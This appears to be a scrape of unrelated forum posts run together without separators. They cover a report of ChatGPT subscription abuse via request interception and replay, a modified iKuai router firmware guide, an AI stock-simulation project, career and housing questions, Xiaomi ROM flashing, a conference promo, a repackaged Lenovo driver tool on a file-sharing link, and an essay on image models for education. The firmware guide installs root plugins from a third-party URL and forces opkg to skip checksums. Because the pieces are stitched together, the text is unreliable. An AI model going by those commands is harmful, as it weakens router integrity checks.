2026年4月

https://community.openai.com/t/google-uk-plus-pro-plan-is-being-widely-abused/1379242

To the OpenAI technical department

I am writing to formally report a serious and increasingly organized abuse of the ChatGPT Plus “first-month free trial” promotion, as well as the ChatGPT Pro subscription plan, both of which are currently being exploited through technical means in certain regions such as the United Kingdom and Japan. Based on sustained observation and analysis, certain unauthorized actors are leveraging advanced techniques to systematically intercept, manipulate, and resell promotional eligibility and subscription access at scale. This activity has evolved into a structured gray-market operation, posing significant risks to platform integrity, user security, and fair market competition.

  1. Technical Methods and Operational Workflow (Key Findings)
    The misconduct observed extends beyond simple account reselling and demonstrates a high degree of technical sophistication. The primary methods include:

Traffic Interception (Packet Capture)
Unauthorized actors utilize packet capture tools to intercept and analyze network requests generated during the registration and activation processes of eligible users in designated regions (e.g., the UK and Japan). Through this process, critical parameters—such as subscription identifiers, regional markers, and promotional eligibility tokens—are extracted.

Credential Extraction and Reverse Engineering
By analyzing API responses and validation logic, these actors identify key fields governing trial eligibility and subscription validation. This enables them to extract and reconstruct credentials in a transferable or reusable form.

Cross-Account Reuse and Credential Replay (“Rebinding”)
The extracted eligibility credentials are reused or replayed across different accounts by modifying request parameters or reissuing intercepted requests. This allows promotions or subscription states—originally restricted to specific regions and user conditions—to be applied to other accounts, including those outside eligible regions or with prior subscription history.

Extension to Paid Subscription Abuse (ChatGPT Pro)
In addition to the abuse of free trial eligibility, similar techniques are reportedly being applied to the ChatGPT Pro subscription plan. Unauthorized actors appear to exploit intercepted or manipulated subscription flows to provide access to Pro-level services at artificially low prices, further amplifying market distortion and platform risk.

Commercialization and Gray-Market Distribution
These unlawfully obtained and reused trial entitlements and subscription accesses are subsequently packaged and sold through third-party platforms, social media channels, or private transactions at significantly discounted prices, forming a profit-driven gray-market ecosystem.

  1. Risk and Impact Assessment

This behavior introduces multiple layers of risk and adverse impact:

Violation of Platform Policies and Compliance Standards:
These actions clearly bypass the intended constraints of both promotional offers and paid subscription models, undermining enforcement of terms such as regional eligibility, first-time use, and non-transferability.

Distortion of Market Pricing Structures:
Artificially low resale prices disrupt both trial conversion funnels and standard subscription pricing (including Plus and Pro tiers), compromising fair competition and revenue integrity.

User Security and Privacy Risks:
Users engaging in such transactions may be required to share account credentials or undergo abnormal procedures, exposing them to account compromise, data leakage, or potential suspension.

Increased Burden on Platform Risk Control Systems:
Abnormal activation patterns and fraudulent subscription behaviors may strain detection systems and degrade overall service reliability.

Indication of Underlying System Vulnerabilities:
The feasibility of such exploitation suggests potential weaknesses in eligibility binding, token validation, subscription state verification, and anti-replay protections.

  1. Recommended Technical and Administrative Measures

To mitigate and prevent further abuse, the following actions are recommended:

Strengthen Credential and Subscription Binding Mechanisms
Bind trial eligibility and subscription states to multiple factors, including account ID, device fingerprint, payment profile, and geolocation data. Implement one-time-use tokens and stricter session validation.

Enhance API Security and Anti-Replay Protections
Introduce robust request-signing mechanisms (e.g., dynamic signatures, timestamps, nonce validation) to prevent intercepted requests from being reused.

Reinforce Regional and Eligibility Verification
Apply multi-layer verification for regional eligibility (IP address, billing information, Google account region, etc.), and flag anomalous cross-region activities.

Upgrade Anomaly Detection and Risk Control Systems
Deploy advanced monitoring models to detect abnormal trial activation and subscription patterns, including high-frequency activations and cross-account irregularities.

Crack Down on Unauthorized Resale Channels
Identify and penalize accounts and entities involved in resale activities, and collaborate with relevant platforms to remove illicit listings.

Improve User Awareness and Risk Communication
Clearly inform users about the risks associated with purchasing services from unofficial channels.

  1. Formal Request for Action

In light of the above, I respectfully urge OpenAI to:

Conduct a comprehensive technical audit and security review of both trial and subscription systems (including Plus and Pro tiers);

Promptly identify and remediate any existing vulnerabilities;

Investigate and eliminate ongoing abuse activities at scale;

Enforce strict penalties against accounts and entities engaged in such misconduct;

Continuously enhance risk control mechanisms to prevent recurrence.

This issue not only threatens the stability of the platform’s commercial model but also directly impacts user trust and brand integrity. Swift and decisive action is essential to restore fairness, ensure compliance, and maintain a secure and transparent service environment.

Thank you for your attention to this matter. I am willing to provide additional technical details or supporting evidence if required.

老爸赋闲在家,平常刷手机玩,最近要帮家里侄孙子参谋高考报考这种需求。



选啥合适,线下也没摸过 neo ,估计等我摸过之后可能更明确一点了

熬了一个通宵,在爱快软路由 iKuaiOS 系统上实现了 musl 兼容层,使整个 OpenWrt 的软件包生态可以原生运行在爱快上,不需要虚拟机、Docker 装 OpenWrt ,总之也是 https://www.v2ex.com/t/1206925 闲鱼插件哥给的灵感,不过 iKuai 的国内用户量是真的很大,稳定性和多 IPv6 线路、流控能力都广受好评,那么好的系统连一个 root 都没有,生态封闭得爱快云上只有一个 Docker 插件,想装个 htop 、tcpdump 都不行。

大概研究了下,iKuai 的 binary 用的是 uClibc ,而新的 OpenWrt 用的是 musl libc ,因此两者不兼容直接跑会报错。得益于 OpenWrt 有 20k+的软件包,我从一开始补 opkg 、chroot openwrt 到最后的 musl 支持,向各位 V 友汇报。

不过爱快都在搞 4.0 了,3.7.x 本身就没在维护了,就当 EOL 前的狂欢吧。

正文

核心发现

Linux 内核支持同时运行多种 libc的程序,每个 ELF 二进制文件在 header 里指定了自己的动态链接器( interpreter ):

uClibc 程序: /lib/ld64-uClibc.so.0
musl 程序:   /lib/ld-musl-x86_64.so.1
glibc 程序:  /lib64/ld-linux-x86-64.so.2

内核根据 ELF header 自动选择对应的 linker 。只要把 musl 的 linker 放到 iKuai 上,musl 程序就能跑。

实现步骤

1. 放置 musl 动态链接器

# 从 OpenWrt rootfs 中获取 musl linker
# ld-musl-x86_64.so.1 实际上就是 musl libc.so 的 symlink
ln -sf /path/to/musl/libc.so /lib/ld-musl-x86_64.so.1

2. 配置库搜索路径

musl 的 linker 使用/etc/ld-musl-x86_64.path(类似 glibc 的ld.so.conf):

echo "/path/to/musl/libs" > /etc/ld-musl-x86_64.path
echo "/path/to/musl/usr/lib" >> /etc/ld-musl-x86_64.path
echo "/usr/lib" >> /etc/ld-musl-x86_64.path

3. 安装 opkg 包管理器

opkg 是 OpenWrt 的包管理器。我们使用了一个glibc 静态编译版本( 680KB ),可以在 iKuai 上原生运行:

opkg update    # 更新 6 个 OpenWrt 仓库
opkg install --force-depends --force-space --force-checksum htop

4. 验证

$ /usr/bin/htop --version
htop 3.3.0

$ /usr/bin/tcpdump --version  
tcpdump version 4.99.4
libpcap version 1.10.4

musl 程序和 uClibc 程序在同一个 iKuai 系统上和平共处!

为什么这样做?

不用 Docker

Docker 在软路由上需要额外资源(内存、存储),而且官方 Docker 插件版本老旧。很多时候你只是想装个小工具,不值得开 Docker 。

不用 chroot

最初我们尝试了 chroot 方案(下载一个 mini OpenWrt rootfs ,chroot 进去用)。可以工作,但:

  • 需要手动管理 mount bind
  • 每次进出 chroot 很麻烦
  • 服务管理复杂

不用刷 OpenWrt

有些人直接刷 OpenWrt 。但 iKuai 的多 WAN 、流控、行为管理是 OpenWrt 做不到的。

musl 兼容层是最轻量的方案:一个 symlink + 一个 path 文件 = 整个 OpenWrt 生态。

Naixi 项目

我们把这些工作整合成了Naixi——一个 iKuai 增强固件:

Naixi Plugin Manager

插件管理:
  naixi list                 列出所有插件
  naixi install <file|url>   安装插件(tar.gz)
  naixi enable <name>        启用插件
  naixi disable <name>       禁用插件

OpenWrt 兼容层:
  naixi opkg install <包名>  安装 OpenWrt 包(原生运行)
  naixi opkg update          更新包列表
  naixi opkg list            列出可用包
  # https://dl.naixi.net/ikuai-naixi/naixi_latest.sh

已安装组件展示

=== 已安装组件 ===
  ✓ docker v202102031900  [naixi]   运行中
  ✓ lucky v1.1.16         [naixi]   运行中
  ✓ opkg v1.0.0           [naixi]   运行中
  ✓ shell v202306081801   [pmd]     运行中
  · htop 3.3.0-1          [opkg]    已安装
  · tcpdump 4.99.4-1      [opkg]    已安装

云平台控制: Level 2
musl 兼容层: ✓ 已初始化 (12.6M)
opkg 原生环境: ✓ 已初始化 (opkg version 0.7.0)

四种来源的组件统一管理:

  • [naixi] — Naixi 插件( tar.gz 格式,支持 enable/disable )
  • [pmd] — 爱快官方插件( pmd 管理,WebUI 可见)
  • [opkg] — OpenWrt 包( opkg 安装,musl 原生运行)
  • [musl] — chroot 环境中的包(可选)

重启持久化

iKuai 的 rootfs 在内存中,重启后 opkg 装的包会丢失。Naixi 通过 boot 脚本自动恢复:

# 安装时自动记录
opkg list-installed > /etc/log/naixi/opkg-installed.txt

# 重启时自动恢复
opkg update && cat opkg-installed.txt | awk '{print $1}' | xargs opkg install --force-*

技术细节

iKuai 用的是 uClibc ,不是 glibc

很多人以为 iKuai 基于标准 Linux 发行版( glibc )。实际上 iKuai 使用的是uClibc

$ /lib/ld-musl-x86_64.so.1 --list /usr/sbin/tcpdump
  /lib/ld64-uClibc.so.0 (0x7f4b1e325000)
  libc.so.0 => /lib/ld64-uClibc.so.0

这意味着:

  • 旧版 OpenWrt ( 15.05/17.01 )的 uClibc 包可以直接原生运行
  • 新版 OpenWrt ( 18.06+)的 musl 包需要 musl 兼容层
  • glibc 程序(大部分 Linux 发行版)需要额外适配

overlay 持久化

iKuai 自带 overlay filesystem 在/usr上:

overlay on /usr type overlay (rw,relatime,lowerdir=/usr,upperdir=/overlay/upper,workdir=/overlay/work)

opkg 安装的文件通过 overlay 写入,但/overlay/upper在 tmpfs 中。Naixi 通过记录+重装方式解决持久化。

可用的 OpenWrt 包

理论上 OpenWrt x86_64 仓库的所有包都能安装。已验证:

包名 版本 状态
htop 3.3.0
tcpdump 4.99.4
opkg 0.7.0
curl - 待测试
python3 - 待测试
luci - 需要 ubus ,受限

下载安装

  • 安装任意官方爱快 ISO ,由于是 rootfs 系统随便装个3.7.x 版本就行

  • Naixi v61v3 (3.7.19): 下载固件并升级

  • 启动 SSH ,前往系统设置-->登录管理-->远程访问-->远程维护:

    undefined

用户名:sshd ,密码就是你设置的那个远程维护密码,登录后就是 root 权限。

安装 OpenWrt 运行环境

  1. 安装 opkg 插件:naixi install https://dl.naixi.net/ikuai-plugin/opkg.tar.gz

  2. 开始使用:opkg update && opkg install htop

  3. 执行htop可见 ik_rc_client 等爱快进程

  4. 插件可通过 naixi list查询列表及运行状态

安全声明

仅用于探索 iKuai 系统的可扩展性,使用naixi指令前请了解:

  • 修改固件可能影响稳定性

  • 云控阻断可能影响官方功能更新

  • 建议在测试环境验证后再用于生产

  • 启动时,将会由naixi_boot进行挂载,可使用cat /tmp/naixi_boot.log查看日志

    undefined

关于

  • 项目使用的文件: https://dl.naixi.net/ikuai-naixi
  • 分析工具:Nyarc — 固件逆向工程控制台
  • 仅用于学习用途,资源仅限个人学习、研究使用,不得用于商业运营、传播或非法用途;版权归爱快公司所有;使用者应在合理范围内使用,24 小时内删除

Aniu——利用东方财富妙想接口进行虚拟炒股的平台,个人第一个 Vibe Coding 项目

项目地址:AnacondaKC/Aniu: 利用东方财富妙想接口的 AI 模拟炒股平台

0.更新日志

V0.3.0 版本发布 (纯新手小白在维护,bug 和使用不畅大家多包涵)

  • 优化 AI 聊天功能,现在 AI 聊天可以调用技能,读取持仓以及 AI 分析的内容来和你交流了
  • 新增技能管理,可以上传 skillhub 、clawhub 或者用户自己的技能进行使用
  • 新增手动执行,为了防止点击后,AI 自主决策挂单交易,目前主要用于测试分析技能
  • 新增 Markdown 实时渲染和流式输出等其他新的功能

1.背景情况

在介绍项目之前先多啰嗦两句吧,我大学本科是土木工程,毕业后从事的是投资领域的工作,虽然对电脑、电子产品以及软件程序等都非常感兴趣,但是完全的编程小白。自去年OpenclawVibe Coding火起来以后,每天都有各种新想法,前端时间东方财富开放了妙想 Skill的龙虾炒股技能,一直在让自己的龙虾去股海沉浮,但是相关数据不是很直观,所以就想着开发了这样一个程序,专门用来虚拟炒股,这个项目由此诞生,全称用OpenCode+GPT-5.4开发,大概用了一个周末+两个晚上的时间,再加上我的代码水平基本是 0 ,所以基本上也没啥优化,不完善的地方大家多担待。

2.项目情况

Aniu 是一个本地运行的开源 AI 模拟股票交易项目,采用 Vue 3 前端和 FastAPI 后端构建。
项目提供了包括账户总览、AI 分析运行、定时任务执行、AI 聊天和模型/API 配置。它是通过东方财富的模拟仓进行操作,不面向真实资金交易。

3.更新路线图

白天工作比较忙,只有晚上和周末有空,所以更新速度不会很快。
1.继续优化后端工具平台的调用逻辑,让大模型能更加便捷和高效的调用相关接口来获取信息;
2.增加 Telegram 、QQbot 、微信等接口渠道;
3.优化前端页面,现在的页面只满足了功能性,美观性不足;
4.设置界面增加 DeepSeek 、MinMAX 等预设渠道,设置界面增加易用性;
5.AI 聊天功能强化,将定时任务调取的信息和大模型分析的结论进行保存,作为记忆方便后续聊天的时候 AI 大模型进行调用。
6.希望大家能提出更多好的建议...

4.如何使用

前提条件:需要大家下载东方财富 APP ,首页搜索妙想 Skills ,立即领取。点击 APP 下方交易,点击上方模拟,领取 20 万元模拟资金。回到妙想 Skills 界面,下滑找到妙想模拟组合管理 skill ,绑定你的模拟组合。然后将 API Key 保存到程序设置界面填入即可。
注意妙想的相关技能使用有限额。
程序使用:程序支持 Docker 和二进制直接部署

5.整活玩法

大家设置系统提示词的时候可以整活的人设,比如穷困潦倒的中年男人突然获得 20 万元,踏上炒股之旅,或者是 60 岁的老登专炒夕阳产业,赌徒打板,甚至是精神病炒股?

6.多多分享

我用默认提示词+GPT-5.4 操作 23 天收益率是 20%,说实话挺震惊的,它的很多操作让我一个具有十多年投资经验的人都觉得佩服,杀伐果断,雷厉风行。我也跟着它操作了几笔,赚到了一年的大模型 Token 费用。希望大家多多分享自己的收益情况,或者搞一个大模型 A 股收益排行榜?

先说我的 bg: 双非二本, 今年 6 月份毕业, 软件工程专业, 无实习, 近几个月在学习 agent 开发相关知识;

今天去面试了本地一家公司(郑州), 面试结果还行, 就是感觉公司不太靠谱呢,

  1. 公司没有 HR, 老板自己就是 HR, 真正的 boss 直聘...
  2. 公司是做男性保健品的, 自己有工厂生产保健品, 然后有下级的经销商; 技术部门的主要职责就是开发给经销商用的软件系统, 包括前后端、智能体, 然后每月这方面收入的一部分会分给整个技术部门;
  3. 如果进去工作的话, 前后端、智能体都要会做,可能各个流程都要参与, 全栈~全干, 老板强调要会用 AI
  4. 老板不知道什么是三方协议;
  5. 说先让我实习两月, 每月工资 3k, kpi 1k, 补贴 8 百; 如果能力可以的话,等我毕业后转正, 基本工资大概七八千.
  6. 单双休, 每天早 10 晚 7

请各位前辈帮忙分析一下, 这工作靠谱吗, 总感觉做保健品不太靠谱啊!

举个例子,我最近准备租房子,花了很多时间,看了 20 多套房子, 终于找到一套满意的房子。但是因为是新房,我担心甲醛的问题,所以请了有 cma 检测资质的人检测。 检测的时间是 4 月, 春天的时候, 温度 22 度左右, 密闭门窗时间还特意延长到 24 小时,尽管没有把所有的柜子门和抽屉打开。在检测报告出来之前我告诉自己,如果检测结果达标,我就放心,因为我密闭时间是超过标准要求的时间的,即使是刚刚合格, 比如 0.08 , 我都接受。

但是,检测结果是 0.086 。我本来觉得只超了 0.006 ,可以忽略不计, 但是接着我又考虑到即将到来的夏天, 温度会升高,我查了一些资料显示,高温高湿会让甲醛加速释放, 很有可能到夏天的时候, 室内甲醛的浓度,会达到 0.2 以上。于是我又陷入了困境。租得话, 我担心夏天高温导致的更高的风险;因为这个不租的话, 我又不甘心,不死心。

以上例子中的困境,我感觉在我的人生中经常出现。有点心累, 是不是我的认知模式有啥问题?

又是人间 4 月天,今年的 2050 大会即将开幕!

时间:2026 年 4 月 24 日-4 月 26 日

地点:中国杭州 · 云栖小镇国际会展中心

2050 大会,是王坚院士在 2018 年发起了一个面向年轻人的“科技乌托邦式聚会”。

极客邦科技创始人兼 CEO 霍太稳(Kevin)也是最早的共创者之一。

10 年前,几人在上海的一间酒店会议室里聊天,聊着聊着就冒出一个问题——能不能做一个规模大一点、真正属于年轻人的科技聚会?

名字反复打磨,形式一再推敲,这些想法一点点长成了今天的 2050 大会。

2017 年 10 月 29 日在上海某个酒店的会议室,2050 大会开始发芽

从左至右:薛贵荣、王坚、锦木、霍太稳

每年 4 月的最后一个周五周六周日三天,成千上万名来自全球的年轻开发者、创业者和技术爱好者,会聚在杭州云栖小镇,一起聊 AI、造东西、搞点有意思的实验。

这里刻意去掉了大会常见的那套:没有主办方架子、没有 Logo 墙铺满、没有 VIP 标签。所有人统称“自愿者”,人人买票入场。有的就是对科技的热爱,还有开心。

今年,极客邦科技依然深度参与,旗下模力工场和 TGO 的鲲鹏会的伙伴们,为了能在 2050 大会上以更丰富有趣、更意思的方式与大家见面,我们几乎拼尽了全力、绞尽了脑汁。

参与本次系列活动,你可以得到:

  • 实用好玩的 AI 工具+保姆级指南

  • 加入高手云集的 AI 社区,随便聊聊都可能打开新思路那种

  • AI 现场为你特调的小酒或饮品

  • 我们认真打磨、经过多轮头脑风暴设计出的精美周边

  • 不只是技术,还有踢足球、看演出、晨读等活动,顺便认识一群有意思的人

  • ......更多彩蛋,欢迎来线下解锁哦!

了解更多活动信息,更可参与 2050 门票抽奖

新用户扫码入群,如已是小 A 好友,回复 2050,邀你入群。

保姆级指南,带你玩转 2050 大会

在此,我把我们的活动日程+隐藏玩法全量放出,带你玩转 2050 大会

欢迎全网的科技爱好者参加!

4 月 24 日(周五)

14:00–16:00|足球争霸赛

来一场不太严肃、但可能很上头的 5 人制足球局:不管你是技术流还是气氛组,都可以上场跑两脚、顺便认识一群同样好动的人。

2018 年首届 2050 大会足球争霸赛

18:00–21:00|TGO 鲲鹏会学员欢迎晚宴

这一顿不只是欢迎,更是一次轻松认识彼此的机会:边吃边聊,说不定就聊出下一次合作或灵感。

4 月 25 日(周六)

全天| “你得了 AI 病 · AI 职场心声站”展台

不只是一个“看展台”,更是一个可以一路玩下来的 AI 体验区(还有超多礼物可拿)。

你可以从抽一张 AI 工具卡开始:30 秒带走一个真实好用的 AI 应用,说不定正好解决你最近的一个小问题。

接着,再做点不一样的:

  • AI 为你现场定制一个专属徽章

  • 或者来一杯 AI 给你调的饮品,按你的心情和口味现场匹配。

还可以停下来写几你对 AI 职场的想法

在“打工人实录”和“早日退休”两棵树上留言,可以尽情吐槽(要夸也行)。这些内容,之后真的有机会被整理成开源 Skill(选中的我们还会再送你额外的礼物哦)。

还有精美神秘好礼,等你来拿!

6:30-8:00 | 带上喜欢的文字,一起晨读吧

放下手机,放下短视频,放下 AI,只带来你心爱的篇章。

我们在云栖之眼附近大草坪,迎着朝阳,一起放开嗓子,用声音,和彼此的默契,感受文字的美好。

形式:

1. 我们根据大家的喜好,提前准备好要晨读的篇章,打印少许

2. 现场三五个人一份,有喜欢相应篇章的同学带头晨读,依次循环

目前计划阅读篇章如下,欢迎扫码提出你想读的内容!

14:00-16:00| 亲子时光微电影专场

你可以和孩子把一段回忆、一个小故事,现场变成一支属于你们的微电影。

从“看懂 AI 视频”到“亲手创作”,没有门槛,一步步完成一支 2 分钟亲子短片。作品会在现场大屏幕放映,把那些平时说不出口的瞬间,认真记录下来。

19:00 起(具体时间待定)| 合唱表演

一群爸爸妈妈和孩子组成的合唱团~带来一首原创歌曲《一群无知少年的梦想》

做个呼应,2018 年 2050 创始届的青春舞台

###4 月 26 日(周日)

全天| “你得了 AI 病 · AI 职场心声站”展台

(活动信息同上)

6:30-8:00 | 带上喜欢的文字,一起晨读

(活动信息同上)

9:00-12:00 | AI 社区怎么干?

这次,我们想聊的,是一个更大的问题:AI 社区,到底该怎么做?

如果你对 AI 时代的社区怎么玩儿,有想法、在做相关事情,或者只是好奇未来的科技会怎么发展,都欢迎来聊一聊。

当然,还有一些精心准备的小礼物等你来拿~

更多 2050 大会信息,请参考下面的海报。

最后,再给新朋友们做个自我简介

所有来 2050 大会「探索空间」找到「模力工场」的朋友,都可以带走我们精心准备的多种礼品和周边(数量有限,先到先得~)。

(部分)先给你们透一眼:

  • “模力工场”手提袋,我们原创设计图如下:

  • 一张你的专属 AI 应用小卡,一共 14 款,看看你会抽到哪张:

还有专属徽章和 AI 特调饮品等更多好物,等你来现场解锁!

第一次听说我们?没关系,自己介绍放这儿了:

模力工场,是一个帮你“每天发现好用 AI 应用的社区”。

它起源于我们对 AI 工具的一个明确期待:AI 工具不该只是“看起来很厉害”,而是要像魔法一样,巧妙地把难题解决掉。

我们做的事情很简单:帮你把海量 AI 工具筛一遍:哪些真的有用、哪些只是噱头,我们替你试过、踩过坑、整理好再给你。

在这里,你可以:

  • 找到真正能解决问题的 AI 工具

  • 看到别人是怎么用 AI 提效、做项目、甚至玩出花的

  • 也可以把自己的产品放上来,被更多人看见、一起打磨

每周,我们都会更新一份 AI 应用榜单,不管你是被 DDL 追着跑的打工人,还是在各种需求里反复横跳的“表哥表姐”,总有一款 AI,能接住你的焦虑,也放大你的想法。

目前,模力工场已经收录了 600+款 AI 应用,还在持续增长中。

欢迎大家来模力工场寻觅适合你应用,也期待各位上传推荐你喜欢的 AI 应用~

模力工场传送门:https://agicamp.com/

工作十年 各种原因需要 Gap
已经 8 个月 2 月开始看机会
之前在两三年前的风口行业 硬要对比对标 p7
吃老本的话最多再一年 且有不少房贷

现在打算延续该风口行业的分支 会比较偏门
两三个月下来本地机会聊到后期都杯具
属于向上爬够不太到需求也少 向下苟年纪大
体现在职位不匹配、行业不匹配、工作内容不匹配

好消息是接了一个机会 还略有涨薪 10%
坏消息是需要异地 base 和比较卷
主要纠结身体确实不太好可能卷不太动
另外有一些兴趣爱好有深入计划

寻求各位大佬意见
是啥也不想先去试试 还是再找找其他方向(需要大量准备)
可能有熟人信息比较隐晦见谅

上个手机小米 10 战了 5 年多后,最终顶不住了,有点小卡顿,也可能是 app 装的有点多,垃圾太多了,虽然舍不得,也没办法。

在用小米 10 的过程中,国内系统升级越来越卡,广告越来越多,又内置了反诈,在某天接到反诈电话时,我就瞬间决定不在用国内的系统了,感觉不管是电话,短信,网址,app 都被监控了,我是不能接受在不经过我同意的情况下被监控的感觉。在 23 年解锁 bl 刷了阿三版用到今天(为什么要用阿三版,因为当时的国际版竟然不支持双卡,nnd ),总体体验不错。

最近换了 16+1t 的小米 13ultra ,在经历降级绑定解锁后(不得不说这过程堪比唐僧取经,我能告诉你我本来买了 14 发现不能解又买了 13u 吗,有人说为什么不买 17 ,17 可以漏洞解,我朋友 24 年中买的小米 14 已经脚斩,严重的跳水机,且已经没有性价比,小米已忘初心),经历 9981 难解锁了 bl 。。。我一直在找适合我的系统,因为我本身做技术的,需要经常去外网查资料,所以国内的系统不考虑(原因参考上边)。

我第一首选的 hyperos2 国际版,刷入了体验了一下还不错,但是有一个我经常用的功能被取消了,我不能接受,就是息屏听剧功能,我经常需要听着喜欢的视频入睡。国内系统一直都有,国际版竟然被阉割了,就是小米 10 miui14 阿三版都有的功能,我又尝试刷入了国际版,台湾版,阿三版( hyperos1-3 )都没。。。后来查询得知好像和油管的付费功能有冲突,被取消了,我只能 mmp 。但在过程中发现台湾版的拨号和短信不是 google 原生的,还有一些其他的系统设计跟国内系统比较像比较符合国内用户习惯,对台湾版有好感,我甚至还用了 2 天台湾版 hyperos2 。。。

中间我也尝试了 eu 版(miui14-hyperos3),eu 版很多去除了很多内置软件,也支持息屏听剧,理论上我是不是应该喜欢它,但是 eu 版也有缺陷,自带小米换机是系统软件,和 googleplay 上的小米换机和国内官方下载的小米换机不兼容不能传输数据,且不能通过 play 商店升级也不能自己安装升级,不能忍受,eu 版的 hyperos3 倒是没内置,但是 hyperos3 eu 版不知为何严重掉帧,比国际版原生 hyperos3 更卡顿,此外 eu 版是社区版不是欧洲版,不是官方系统就算了,这最基础的功能都有这么严重的问题,总之服了,不能忍受。。。

在这期间我发现台湾版系统不错,又想用 hyperos ,我就想算了,没有息屏听剧我忍了,台湾版 hyperos2 我用了两天,发现 hyperos2 ,电量消耗很快,最终忍不了。。

因为之前的小米 10 miui14 印度版有息屏听剧功能,切在刷机过程中对台湾版有好感,我就刷了小米 13ultra miui14 台湾版,刷了进去,一切还好,不仅流畅,息屏听剧也有,电池也更耐用了。。。

最终我还是回到了 miui ,在经过这么折腾后,这可能是我最后一部小米手机了

 一、工具简介

联想驱动管家是联想官方推出的硬件驱动管理工具。

安装包下载:https://pan.quark.cn/s/05ede3133ecc

    • *

二、使用步骤

1. 解压工具包

右键点击【联想驱动管家-绿色版】压缩包 → 选择【解压到联想驱动管家-绿色版】。

2. 进入程序目录

双击打开解压后的文件夹 → 进入【Lenovo Drivers Management】文件夹。

3. 启动程序

找到【lenovodm】应用程序 → 右键点击​ → 选择【以管理员身份运行】。

4. 进入主界面

软件启动后,首页将自动扫描硬件并展示驱动状态(如下图所示)。

事情是这样的。

这两天,我刷到一堆人在拿 GPT-image-2 做抖音封面,做梗图,做那种看一眼就过去的小乐子。

我当时就愣住了。

不是因为这些图不好玩。

而是因为我脑子里冒出来的第一个念头,根本不是娱乐。

是教育。

说真的,我甚至有点替一批做教育内容的人捏了把汗。

很多人嘴里说的 GPT-image-2,我猜大概率指的是 OpenAI 这一代新的图像能力。按 OpenAI 在 2025 年 12 月 16 号的官方命名,它其实叫 GPT Image 1.5。

名字不重要。

重要的是,比赛的味道已经变了。

OpenAI 现在在官方开发文档里,已经明确把 GPT Image 摆到了 DALL·E 2 和 DALL·E 3 前面,推荐大家优先用它。更狠的是,文档里还直接写了,DALL·E 2 和 DALL·E 3 会在 2026 年 5 月 12 号停止支持。

这基本就不是普通升级了。

这有点像裁判直接下场,把旧规则给掀了。

SCR-20260418-udgp.png

image.png

为什么我会说它离谱。

不是因为它更会画美女。

不是因为它更会做电影海报。

也不是因为它更适合拿去做短视频封面。

这些都只是表面热闹。

真正让我有点坐不住的,是 OpenAI 官方这几份材料里透露出来的能力组合,已经非常不像一个单纯的画图模型了。

它更像一个能理解内容结构、还能把内容重新视觉化的生产工具。

官方文档里写得很直接,GPT Image 这条线现在主打的,不只是出图质量,而是 instruction following、text rendering、detailed editing、real-world knowledge。

翻成人话就是。

你让它听话,它更听话了。

你让它在图里写字,它终于没那么瞎写了。

你让它改图,它能尽量只改你要改的地方。

你让它画一个有知识背景的东西,它不再只能瞎蒙。

而 OpenAI 那份 prompting guide 更骚。

里面放的根本不是什么单纯的二次元头像案例。

它直接给了信息图、海报、翻译图、界面草图、儿童绘本角色一致性、多图编辑这些生产级玩法。

看到这儿我就一个感觉。

不是哥们,这东西你们还只拿去做梗图和封面图???

这玩意如果还只拿来做抖音乐子,多少有点暴殄天物了。

因为教育行业吃的,恰恰就是这套能力组合。

教育不是一个只需要一张漂亮图的行业。

教育是一个疯狂消耗半结构化内容的行业。

课本插图要做。

讲解图要做。

实验流程图要做。

知识点海报要做。

双语版本要做。

题目情境图要做。

同一个卡通人物,第一课出现一次,第三课出现一次,第十课还得长得像同一个人。

你想想看,这里面最痛苦的从来不是审美本身。

而是产能。

是规模。

是每一页都不一样,但又不能差太多。

是每次都要改一点,但不能从头重做。

这才是教育内容工业里最要命的地方。

很多朋友可能不知道,一个老师或者一个教研团队,真正耗时间的,往往不是讲知识。

而是把知识变成能讲的材料。

一节历史课,你得找图。

一节地理课,你得画剖面。

一节生物课,你得把器官、流程、结构、标签全凑齐。

一套低龄英语启蒙,你还得让角色前后统一,风格统一,情绪统一,不然小朋友一翻页就出戏。

以前这些东西怎么做。

PPT 东拼西凑。

网上找素材。

设计外包。

插画师返工。

教研自己改字。

最后整出来一份能用的东西,半条命都快没了。

现在麻烦的地方来了。

如果一个模型已经能比较稳定地做信息图、做海报、做翻译图、做多轮编辑、做角色一致性,那它第一个真正能冲进去的行业,未必是广告,也未必是艺术。

很可能就是教育。

因为教育行业对视觉内容的需求,实在太密了。

而且太碎了。

碎到每一个单点需求都不值得请一个专业设计师。

但全加起来,又是一片巨大的市场。

这就特别像什么呢。

特别像以前做网站那波。

单独看一个 banner,一个按钮,一张插图,都不值多少钱。

但当全行业每一天都在疯狂生产这些小东西的时候,最后长出来的不是一个功能。

是一个产业。

HGCWtDeboAAQ7w8.jpeg

顺着上面的再聊聊,我觉得 GPT Image 真正适合教育的地方,至少有三层。

第一层,是教材和讲义里的视觉解释。

这一层以前最难的,不是画得漂不漂亮。

而是画得对不对。

字能不能落对。

标签会不会乱飞。

结构有没有逻辑。

OpenAI 现在的官方案例里,已经在反复强调 poster、infographic、translation in images 这些能力了。连深海海报、世界知识类图像这种东西,都已经被拿出来做前后代对比。

这就说明一件事。

模型已经开始碰那种既要视觉,又要知识结构的任务了。

这对教育太关键了。

你做一个地理洋流图,一个化学装置示意图,一个语文修辞讲解卡片,一个历史时间线,不再是完全不可能自动化的事。

第二层,是教学演示和课件。

这个就更夸张了。

老师做课件,说到底不是在做设计。

是在做解释。

但过去这件事最别扭的地方在于,你明明是在解释知识,最后大量时间却花在了排图、修图、找风格一致的素材上。

现在如果 GPT Image 可以通过一轮轮编辑,把同一套视觉语言稳定下来,再把文本、标签、版式慢慢修正,那它其实已经很接近一个课件素材引擎了。

不是直接替代老师。

而是把老师从素材工地里先救出来。

第三层,是练习册和试卷。

这块我得稍微泼一盆冷水。

别上头。

OpenAI 自己在官方文档里也写了,虽然 text rendering 比 DALL·E 系列强了很多,但它依然可能在精确文字排布、复杂布局、长文本清晰度上翻车。

所以你如果说,今天就让它一键吐出一份可印刷、零错误、可直接大规模交付的高考模拟卷。

说实话,我也不信。

但如果你把目标往回收一点,事情就完全不一样了。

题干配图。

阅读理解插图。

几何辅助图。

实验观察题图。

双语练习卡。

绘本式单词纸。

这些东西,它已经非常接近能打了。

真正聪明的做法,不是让模型包打天下。

而是让它负责最耗人工的视觉生成和修改,再把最后那层严肃排版、题号、分值、标准答案,交给 HTML、Word、PDF 或题库系统去收口。

一旦这么想,这生意就通了。

因为你做的就不再是一个 AI 画图玩具。

你做的是教育内容工作流。

前面接教案、知识点、课程大纲。

中间自动生成讲解图、角色图、板书图、演示页、练习卡。

后面接审校、排版、导出、分发。

这才是能做成产品的地方。

而且不是一个产品。

